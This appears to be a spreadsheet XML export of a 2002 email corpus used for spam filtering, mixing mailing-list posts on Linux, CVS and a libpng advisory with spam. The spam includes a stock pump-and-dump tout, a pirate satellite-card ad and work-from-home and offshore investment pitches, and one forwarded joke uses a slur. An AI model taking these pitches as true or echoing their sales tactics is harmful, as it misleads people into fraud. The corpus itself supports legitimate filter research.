                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvF0v1HKqBxDVAmoBamZR" &gt;
 Bush talks tough on corporate fraud&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXFQfKUsA98BbBL7kOi_dR" &gt;
 Vignette's forecast dips on demand woes&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXOrYLMLlKMZ2Fz8IR7XcR" &gt;
 WorldCom: The clock is ticking&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK8vtN8WxMktQ3DlPfP8NRR" &gt;
 Deutsche Telekom up on CEO talks&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAEmvf_rv9Z5VKc-3P0BlR" &gt;
 NTT DoCoMo tries new 3G twist&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHwWFD9MHYjKHbtbXYzH4R" &gt;
 Vivendi units harmonize in digital deal&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEIKwv_1pH7Bc1bJBykEmeR" &gt;
 AOL Time Warner secures new credit&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK1SVsULUc6gJLkjCXMZHsR" &gt;
 Banks bail out Vivendi with loans&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1UyTjJsQ3V0z6qjySJGZR" &gt;
 It ain't heavy; it's my laptop&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB45rLNHcQhaIHsSzky0uR" &gt;
 Matsushita: Chip unit headed toward black&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7TCKoi9gVnxXFZcIuIsR" &gt;
 French game maker up on Sega rumors&lt;/a&gt;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href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkVTpPDzlRmBekeVktk2ZR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=ec-MHlXray63gwtHPxvVqBAYENOGKW9jRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jHgOhG8rMvurMPGPxZ6RcR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFV5ruiQADblRuaBDxRURR"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href="http://clickthru.online.com/Click?q=2b-2FVYINzsBKYmzY1wzk0xBfd-8WFR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImGNYE8fU5CfCkxHB0FrR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9YfTpcErctPQDwwaMCiR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwxylgIK80ywQ-4d0P6lR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KilA5FaIoaDkjVsTLZ89R" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJolMF9lor1yZeU_u_KnuR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e433&amp;ISSUE=2002-07-09" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=aa-gBae-hU-_tfD2LsnEUuZc5Hbw9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $$$$$$For your satellite system$$$$$$ 2467SzaW6-857eRkG8484hNWz3-33-27
</t>
  </si>
  <si>
    <t xml:space="preserve">RECIEVE ALL CHANNELS ON YOUR SATELLITE SYSTEM! 1-888-406-4246
 With our Pre-Programmed Satelite Cards get ALL channels
 availible including ALL Pay-Per-View channels!!
 Never miss any of your favorite shows again!
 Our Pre-Programmed Access Cards work on ALL Satellite Systems!
 Our pre-programmed satellite cards are $329.00 and are
 shipped FedEx 2-Day COD Delivery!
 Comes with a 30-Day Money Back Guarantee, 3 Year Warranty
 and a 24-hour tech support line available!
 Take your old card out, replace it with your new one
 and receive everything available!  It's that easy!
 -------------------------------------------------------------
 Order yours TODAY by calling 1-888-406-4246
 This message will only be sent to you once. 
 You will not receive any future updates.
 Any questions please call 1-888-406-4246.
 1704xszn1-577ZfdS2166WWdp8-18l27
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: How to end the war....
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Rob Windsor &lt;windsor@warthog.com&gt;
 Forwarded-by: "David Dietz" &lt;kansas1@mynewroads.com&gt;
 The latest proposal to drive the Taliban and Al Qaeda out of the
 Mountains of Afghanistan is to send in the ASF (Alabama Special
 Forces) Billy Bob, Bubba, Boo, Scooter, Cooter and Junior are being
 sent in with the following information about the Taliban:
 1. There is no limit.
 2. The season opened last weekend.
 3. They taste just like chicken.
 4. They hate beer, pickup trucks, country music, and Jesus.
 5. Some are queer.
 6. They don't like barbecue.
 And most importantly...
 7. They were responsible for Dale Earnhardt's death.
 We estimate it should be over in just about two days.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: After posting my comment yesterday about next things I want to
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:11:28AM
 Date: Mon, 23 Sep 2002 15:11:28 GMT
 After posting my comment yesterday about next things[1] I want to do, I'm 
 starting to get job offers. Hey I wasn't expecting that. But I like it I like 
 it. Especially in this stinkin economy. On the other hand can you imagine _me_ 
 with a job? ";-&gt;"
 [1] http://scriptingnews.userland.com/backissues/2002/09/22#whatsNextForDave
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This Stock Rumored to FLY
</t>
  </si>
  <si>
    <t xml:space="preserve">SPECIAL SITUATION ALERTS HOT PICK OF THE YEAR
 Environmental Remediation Holding Corp. (OTCBB: ERHC)
 URGENT BUY: $ .17
 SELL TARGET: $1.25
 INVESTOR ALERT: ERHC enters into joint-venture license agreement
 with SCHLUMBERGER LTD (NYSE: SLB, $60) and BAKER HUGHES, INC.
 (NYSE: BHI, $40) for seismic data on some of the richest offshore
 oil blocks where ERHC controls a huge working interest!
 INVESTORS - WE HAVE FOUND THE HIDDEN GEM: (OTCBB: ERHC)!
 ERHC's joint-venture with SCHLUMBERGER and BAKER HUGHES puts them in
 world-class company with these leaders in oil exploration and reservoir
 imaging services.  The involvement of SLB and BHI reinforces the
 $MULTI-BILLION DOLLAR VALUE that has been placed in this offshore
 drilling haven.  ERHC's goal is to maximize shareholder value from
 existing contractual rights, making them a significant player in
 this region.
 THE BIG MONEY ROLLS IN:
 The seismic data from this joint-venture is being made available for
 further involvement by the LARGEST OIL COMPANIES IN THE WORLD over
 the next 2 weeks!!
 Bidding wars have already developed between major oil companies suchas:
 SHELL, CHEVRON/TEXACO, CONOCO, EXXON/MOBIL, PHILIPS, and MARATHON who
 are willing to pay $Hundreds of Millions to drill in these zones and
 partner with ERHC.
 STOCK SET TO EXPLODE ON EARNINGS BOOM:
 ERHC's exclusive right to participate in exploration and production
 along with OIL INDUSTRY GIANTS could be worth up to $FIFTY MILLION
 as these oil blocks are adjacent to Billion Barrel producing regions!
 SPECIAL SITUATION ALERTS' newsletter offers valuable research that
 builds your wealth.  We target serious gains for serious investors
 with a 700% investment return on ERHC.
 DISCLAIMER: Certain statements contained in this newsletter may be 
 forward-looking statements within the meaning of The Private Securities
 Litigation Reform Act of 1995. These statements may be identified by
 such terms as "expect", "believe", "may", "will", and "intend" or 
 similar terms. We are NOT a registered investment advisor or a broker
 dealer. This is NOT an offer to buy or sell securities. No 
 recommendation that the securities of the companies profiled should be
 purchased, sold or held by individuals or entities that learn of the
 profiled companies. This is an independent electronic publication that
 was paid $10,000 by a third party for the electronic dissemination of
 this company information. Be advised that investments in companies 
 profiled are considered to be high-risk and use of the information 
 provided is for reading purposes only. If anyone decides to act as an
 investor they are advised not to invest without the proper advisement
 from an attorney or a registered financial broker, if any party decides
 to participate as an investor then it will be that investor's sole risk.
 Be advised that the purchase of such high-risk securities may resultin 
 the loss of some or all of the investment. The publisher of this 
 newsletter makes no warranties or guarantees as to the accuracy or the
 completeness of the disclosure. Investors should not rely solely on the
 information presented. Rather, investors should use the information 
 provided in this newsletter as a starting point for doing additional
 independent research on the profiled companies in order to allow the
 investor to form their own opinion regarding investing in the profiled
 companies. Factual statements made about the profiled companies are made
 as of the date stated and are subject to change without notice. 
 Investing in micro-cap securities is highly speculative and carries an
 extremely high degree of risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Central
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/06.html#central
 Date: 2002-10-06T23:30:20-05:00
 _Michael Barrish_: Home[1]. &amp;#8220;Had I been given a choice in the matter, I 
 would have preferred a name that made people think of things I considered more 
 central to my identity, like &amp;#8220;artist&amp;#8221; or &amp;#8220;intellectual&amp;#8221; 
 or &amp;#8220;outrageously good in bed.&amp;#8221;&amp;#8221;
 [1] http://oblivio.com/road/02100401.shtml
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Ximian Updates] libpng has a potential buffer overflow when loading progressive images
</t>
  </si>
  <si>
    <t xml:space="preserve">Severity: Security
 Product: libpng
 Keywords: Red Carpet libpng buffer overflow
 URL: http://support.ximian.com/q?283
 References: 
 Release Notes for libpng 
 ftp://swrinde.nde.swri.edu/pub/png-group/archives/png-list.200207
 libpng is a library used to create and manipulate PNG (Portable
 Network Graphics) image files.
 The 1.2.4* and 1.0.14 releases of libpng solve a potential buffer
 overflow vulnerability[1] in some functions related to progressive
 image loading. Programs such as mozilla and various others use these
 functions. An attacker could exploit this to remotely run arbitrary
 code or crash an application by using a specially crafted png image.
 These new releases also solve other minor bugs such as some memory
 leaks in reading image functions.
 Since most applications which display images use libpng, this affects
 many applications including Evolution and Mozilla. Additionally, Red
 Carpet links libpng statically and needs to be updated separately.
 Ximian only ships libpng on Solaris, and so we only have Solaris
 packages available. When distribution vendors update their packages,
 they will be available in Red Carpet. Please use Red Carpet to upgrade
 libpng to 1.0.14 and Red Carpet 1.3.4-2. You can also get packages
 from the Ximian FTP site:
 Solaris 7/8
 ftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/libpng-1.0.14-1.ximian.1.sparc.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/libpng-devel-1.0.14-1.ximian.1.sparc.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/red-carpet-1.3.4-2.ximian.1.sparc.rpm
 _______________________________________________
 updates maillist  -  updates@ximian.com
 http://lists.ximian.com/mailman/listinfo/updates
 Please DO NOT reply to this list!  Use bugs@helixcode.com or hello@helixcode.com instead.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Garden Ornaments | mvcmv
</t>
  </si>
  <si>
    <t xml:space="preserve">Our delightful garden ornaments combine the finest craftsmanship in woodworking with the lastest technology in paints and hardware:
 http://www.gardenornaments.adv@hellerwhirligigs.com/
 We are the world's biggest whirligig maker.
 Sincerely,
 Studio T. Inc., USA
 The Home of Heller Whirligigs
 Remove:
 E-mail based commercial communication avoids unnecessary spending on catalogs and paper, and helps to preserve valuable natural resources such as forests and oil. We do not wish to share our valuable information about whirligigs with those who are not interested. Should you not wish to receive information from us in the future, please click on  the following removal link:
 http://www.gardenornaments.adv@hellerwhirligigs.com/remove.html
 Even though our database cleansing might be subject to delay or error, we will remove your e-mail address permanently from our database. However, please realize that removal from our database does not guarantee that your e-mail address will be deleted from the many other e-mail marketers who construct databases themselves by harvesting from web sites, or by buying any of the thousands of lists of e-mail addresses that are openly for sale on the internet.
 ...
 xdreksuhlkuytkyspnjct
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: good friend nUYiIFa3s19FyqZIEEC3lLvT
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_LvB0ncUGqkJjbmgyYlLrXGX
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_LvB0ncUGqkJjbmgyYlLrXGXAA"
 ------=_NextPart_LvB0ncUGqkJjbmgyYlLrXGXAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGEgaHJlZj1odHRwOi8vaGxjLm5vLWlwLm9yZz4NCjxpbWcgc3JjPWh0dHA6Ly9obGMubm8taXAu
 b3JnL2NuZ2lmL3lpZGlhbjIuZ2lmIGFsdD1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdpZi95aWRp
 YW4yLmdpZj4NCjwvYT4NCg0KPGEgaHJlZj1odHRwczovL2JuYm4yMDAwLmRuczJnby5jb20+DQo8
 aW1nIHNyYz1odHRwOi8vd3d3MzAuYnJpbmtzdGVyLmNvbS9jbnNwcmluZy9saWtlL2JpZy5naWYg
 YWx0PWh0dHA6Ly93d3czMC5icmlua3N0ZXIuY29tL2Nuc3ByaW5nL2JpZy5naWY+DQo8L2E+DQoN
 CjxhIGhyZWY9aHR0cDovL2ZvcmV2ZXJzcC5ob3B0by5vcmcvemlyZWFsPg0KPGltZyBzcmM9aHR0
 cDovL3d3dzI2LmJyaW5rc3Rlci5jb20vc3ByaW5nY24vbGlrZS90aWFuYW5tZW4uanBnIGFsdD1o
 dHRwOi8vd3d3MjYuYnJpbmtzdGVyLmNvbS9zcHJpbmdjbi9saWtlL3RpYW5hbm1lbi5qcGc+DQo8
 L2E+DQoNCjxhIGhyZWY9aHR0cDovL2V4YW0uaG9wdG8ub3JnL3ppcmVhbD4NCjxpbWcgc3JjPWh0
 dHA6Ly9wdWR1amlzaS50cmlwb2QuY29tL2xpa2UveHVlYW4uZ2lmIGFsdD1odHRwOi8vcHVkdWpp
 c2kudHJpcG9kLmNvbS9saWtlL3h1ZWFuLmdpZj4NCjwvYT4NCg0KPGEgaHJlZj1odHRwOi8vcm9j
 aW82My5ob3B0by5vcmcvZmxhc2g+DQo8aW1nIHNyYz1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdp
 Zi9hbGxhY2NlcHQuanBnIGFsdD1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdpZi9hbGxhY2NlcHQu
 anBnPg0KPC9hPg0KDQo8YSBocmVmPWh0dHA6Ly9leGFtLmhvcHRvLm9yZy9zZWU+DQo8aW1nIHNy
 Yz1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdpZi9zaG91amllLmpwZyBhbHQ9aHR0cDovL2hsYy5u
 by1pcC5vcmcvY25naWYvc2hvdWppZS5qcGc+DQo8L2E+DQoNCjxhIGhyZWY9aHR0cHM6Ly90a3Rr
 LnN5dGVzLm5ldD4NCjxpbWcgc3JjPWh0dHA6Ly9mbGRmaXNnb29kLnRyaXBvZC5jb20vbGlrZS90
 YWl3YW4uZ2lmIGFsdD1odHRwOi8vZmxkZmlzZ29vZC50cmlwb2QuY29tL2xpa2UvdGFpd2FuLmdp
 Zj4NCjwvYT4=
 ------=_NextPart_LvB0ncUGqkJjbmgyYlLrXGXAA--
 ------=_NextPart_LvB0ncUGqkJjbmgyYlLrXGX--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, CDale wrote:
 --]A true geek.  Runs to the puter to post before taking a laboring wife to
 --]the hospital.  I'd kill you.  LOL
 Scripts baby:)-
 One key and I was off.well a few more than one but well under .30 secs of
 time.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; It's this section of spamassassin.raw:
 &gt;
 &gt; &lt;&lt;&lt;&lt;&lt;&lt;&lt; spamassassin.raw
 [...snip]       }
 &gt; =3D=3D=3D=3D=3D=3D=3D
 [... snip ...]
 &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt; 1.68.2.10
 [...snip...]
 This is what cvs puts in when you modify the copy of the file on your disk
 and someone checks in a change and then you pull an update and cvs can't
 figure out how to merge your changes and the checked in changes. The lines
 between the &lt;&lt;&lt;&lt;&lt;&lt; and the ===== are in your file and the ones in the next
 section are what have been checked in. You must have not noticed the warning
 messages about conflicts that cvs gave you when you did the update, and the
 "C" flag next to that file when cvs listed the files being pulled.
  -- sidney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</si>
  <si>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RE: [Webdev] PHP/MySQL Virtual Hosting Recommendations?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Lee,
 + You could try iewebs.com aswell, though I don't know if they do
 + "just hosting".
 +
 Heh, you won't find much on iewebs.com these days. Apache test page.
 For future reference, ieWebs is /kind of/ defunct -- I won't be able to do
 private devel projects for a while, so I'm not actively pushing it. I still
 do hosting and domreg, but I only do vanilla accounts unless I know the user
 reasonably well. I have trust issues.
 Thanks for the plug though. Just like me to no longer have a website when it
 happens. :)
 adam
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">"Hunt, Bryan" stated the following:
 &gt; 
 &gt; choose the repair option when installing windows nt/2000/whatever
 What is the "repair option"?
 &gt; -----Original Message----- From: SoloCDM [mailto:deedsmis@aculink.net]
 &gt; Sent: 31 July 2002 17:48 To: Hunt, Bryan Cc: ILUG (Request)
 &gt; Subject: Re: removing lilo
 &gt; 
 &gt; "Hunt, Bryan" stated the following:
 &gt; 
 &gt; &gt; you need to do a "fdisk /mbr" from a bootable windoze floppy
 &gt; &gt; alternatively boot from linux boot disk and do fdisk, delete all
 &gt; 
 &gt; partitions.
 &gt; 
 &gt; I need to ask a question concerning this issue.
 &gt; 
 &gt; What if I don't want to get rid of the MBR -- it will destroy the
 &gt; OS on that drive.  How do I remove lilo without the above fdisk
 &gt; procedure?
 &gt; 
 &gt; &gt; -----Original Message----- From: jac1
 &gt; &gt; [mailto:jac1@student.cs.ucc.ie]
 &gt; 
 &gt; &gt; i recently had to wipe linux from my pc but forgot to restore the
 &gt; &gt; original MBR (NT). Anyone know how i can do this? linux is entirely
 &gt; &gt; gone and no
 &gt; 
 &gt; boot
 &gt; 
 &gt; &gt; floppy. formatting the entire disk doesn't do it either.
 -- 
 Note: When you reply to this message, please include the mailing
       list and/or newsgroup address and my email address in To:
 *********************************************************************
 Signed,
 SoloCDM
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Viruses that also hack computers on the rise
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8443955,1440/
 Date: Not supplied
 A new internet worm marks a worrying crossover between virus writing and 
 hacking, say experts
</t>
  </si>
  <si>
    <t xml:space="preserve">Immediate Help Needed.  We are a fortune 500 company that is 
 growing at a tremendous rate of over 1000% per year. We simply cannot 
 keep up. We are looking for motivated individuals who are looking to 
 earn a substantial income working from home. 
 This is a real opportunity to make an excellent income from home. No 
 experience is required.  We will provide you with any training you may need. 
 We are looking for energetic and self motivated people.  If that is you 
 than click on the link below and complete our online information request 
 form, 
 and one of our employment specialist will contact you. 
 http://ter.netblah.com:8080
 So if you are looking to be employed at home, with a career that will 
 provide you vast opportunities and a substantial income, please fill 
 out our online information request form here now: 
 http://www.zhoster.com:8080/homeopp/ 
 To be removed from our list simply click on the link below now: 
 http://www.zhoster.com:26000/homeopp/remove.html
 6115CNUY4-341mBpO6887KGZk1-483ZEiE1934cEmx1-116CJYF2258Aegj1-5l58
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Do you owe money? [1njps]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Yannick Gingras wrote:
 &gt; &gt; What do you mean by "CD-Key or the like" (I presume that "of" was a
 &gt; &gt; typo)? And what do you mean by "unbreakable"?
 &gt; 
 &gt; "of" was a typo
 &gt; 
 &gt; Unbreakable would mean here that no one, even previously authorised entity, 
 &gt; could use the system without paying the periodic subscription fee.
 &gt; 
 &gt; &gt; You need to be far more explicit about the problem which you wish to
 &gt; &gt; solve, and about the constraints involved.
 &gt; 
 &gt; It could be an online system that work 95% offline but poll frequently an 
 &gt; offsite server.  No mass production CDs, maybe mass personalised d/l like Sun 
 &gt; JDK.
 &gt; 
 &gt; Nothing is fixed yet, we are looking at the way a software can be protected 
 &gt; from unauthorized utilisation.  
 &gt; 
 &gt; Is the use of "trusted hardware" really worth it ?
 Answering that requires fairly complete knowledge of the business
 model. But, in all probability: no, it isn't usually worth it. So, it
 comes down to how difficult you want to make the cracker's job.
 If the product requires occasional authentication, simple copying
 won't work; the product has to be cracked. In which case, the issue is
 whether you're actually going to enter into battle with the crackers,
 or just make sure that it isn't trivial.
 A lot of it comes down to your customer base. Teenage kids tend to be
 more concerned about cost and less concerned about viruses/trojans,
 and so more willing to use warez. Fortune-500 corporations are likely
 to view matters differently.
 &gt; Does it really make it more secure ?
 Yes; software techniques will only get you so far. Actually, the same
 is ultimately true for hardware, but cracking hardware is likely to
 require resources other than just labour.
 Almost (?) anything can be reverse engineered. But it may be possible
 to ensure that doing so is uneconomical.
 &gt; Look at the DVDs.
 IIRC, CSS was cracked by reverse-engineering a software player; and
 one where the developers forgot to encrypt the decryption key at that.
 -- 
 Glynn Clements &lt;glynn.clements@virgin.net&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] ispell _and_ aspell in Irish
</t>
  </si>
  <si>
    <t xml:space="preserve">I just heard from Kevin Patrick Scannell, author of the Irish-language
 ispell dictionary ("ispell-gaeilge") discussed a month or two ago.
 He's revised it, and moreover has added a version for the much-better
 aspell package ("aspell-gaeilge").  The latter is particularly good news
 for users of OpenOffice.org.
 Details for us anglophones:  http://borel.slu.edu/ispell/index-en.html
 And in Irish:  http://borel.slu.edu/ispell/
 -- 
 Cheers,      "Transported to a surreal landscape, a young girl kills the first
 Rick Moen     woman she meets, and then teams up with three complete strangers
 rick@linuxmafia.com       to kill again."  -- Rick Polito's That TV Guy column,
               describing the movie _The Wizard of Oz_
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Scott MacKenzie wrote:
 &gt;There is a software package that is used (or was up through w2k) 
 &gt;on MicroSloth for this purpose. Ghost, or some such. One essentially 
 &gt;"takes a picture" of the machine's proper config, and then upon 
 &gt;schedule or demand replaces the machine's current config with the 
 &gt;proper picture. It essentially over-writes the entire disk drive. 
 &gt;Especially good for student access machines at libraries, etc.
 &gt;
 And it is pretty common practice in some environments with public 
 workstations to just wipe and re-install Windows machines on a weekly 
 (or even daily) basis. It's easier than trying to maintain Windows.
 Crispin
 -- 
 Crispin Cowan, Ph.D.
 Chief Scientist, WireX                      http://wirex.com/~crispin/
 Security Hardened Linux Distribution:       http://immunix.org
 Available for purchase: http://wirex.com/Products/Immunix/purchase.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SimPastry
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.research.microsoft.com/~antr/Pastry/download.htm
 Pastry is a generic, scalable and efficient substrate for peer-to-peer
 applications. Pastry nodes form a decentralized, self-organizing and
 fault-tolerant overlay network within the Internet. Pastry provides
 efficient request routing, deterministic object location, and load balancing
 in an application-independent manner. Furthermore, Pastry provides
 mechanisms that support and facilitate application-specific object
 replication, caching, and fault recovery.
 ----
 You can download a Pastry simulator off of this web site.
 - Jim
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: International Real Estate - Huge Commissions
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Web Letter&lt;/title&gt;
 &lt;LINK REL="stylesheet" HREF="http://www.sancristobalsa.net/letter/styles.css" TYPE="text/css"&gt; 
 &lt;style&gt;
 &lt;!--
 body
 {
 background-image:
 url(http://www.sancristobalsa.net/letter/images/bg.gif);
 background-repeat: repeat-y;
 background-position: top left
 }
 //--&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"&gt;
 &lt;table align="left" cellpadding="0" cellspacing="0" border="0" width="760"&gt;
  &lt;tr&gt;
   &lt;td colspan="2"&gt;&lt;img src="http://www.sancristobalsa.net/letter/images/header.jpg" width="760" height="90" border="0" alt=""&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
   &lt;td align="left" width="190" valign="top"&gt;&lt;br&gt;
 &lt;table align="left" cellpadding="0" cellspacing="0" border="0" width="190"&gt;
  &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.sancristobalsa.net/letter/images/set1.jpg" width="190" height="400" border="0" alt=""&gt;&lt;/td&gt;&lt;/tr&gt;
  &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.sancristobalsa.net/letter/images/set2.jpg" width="190" height="360" border="0" alt=""&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
   &lt;/td&gt;
 &lt;td align="left" width="560" valign="top"&gt;&lt;br&gt;
                &lt;div align="center"&gt;
                 &lt;P&gt;&lt;B&gt;&lt;FONT COLOR="#294D7F" SIZE="+2" FACE="Verdana,Tahoma,Arial,Helvetica,sans-serif"&gt;Tremendous Investment Opportunity!&lt;/FONT&gt;&lt;/B&gt;&lt;/p&gt;&lt;/div&gt;
                 &lt;div align="justify"&gt;&lt;font class="text"&gt;&lt;p&gt;Are you are fed up with the manipulation and erratic performance of the stock market?&amp;nbsp; Like most people, are you looking for a stable investment that can provide a &lt;B&gt;25%-35% tax-free annual cash flow return?&amp;nbsp; If you answered yes to either question, I have an exciting offering for you.&lt;/B&gt;&lt;/P&gt;
      &lt;p&gt;I represent a company that has a limited offering of emerging growth Caribbean Real Estate that enjoins a tropical working farm, which provides &lt;B&gt;substantial cash flow, long-term wealth accumulation&lt;/B&gt;, and the proven &lt;B&gt;appreciation of Caribbean real estate.&lt;/B&gt;&lt;/P&gt;
                 &lt;p&gt;Here are the details:&lt;/P&gt;
                     &lt;TABLE WIDTH="560" BORDER=0 CELLSPACING=0 CELLPADDING=0 ALIGN=center&gt;
                         &lt;TR&gt;
                             &lt;TD&gt;
                                 &lt;TABLE ID="Table3" BORDER=1 CELLSPACING=3 CELLPADDING=1 WIDTH="560"&gt;
                                     &lt;TR&gt;
                                         &lt;TD WIDTH="560" BGCOLOR="#000000"&gt;
 &lt;ul&gt;
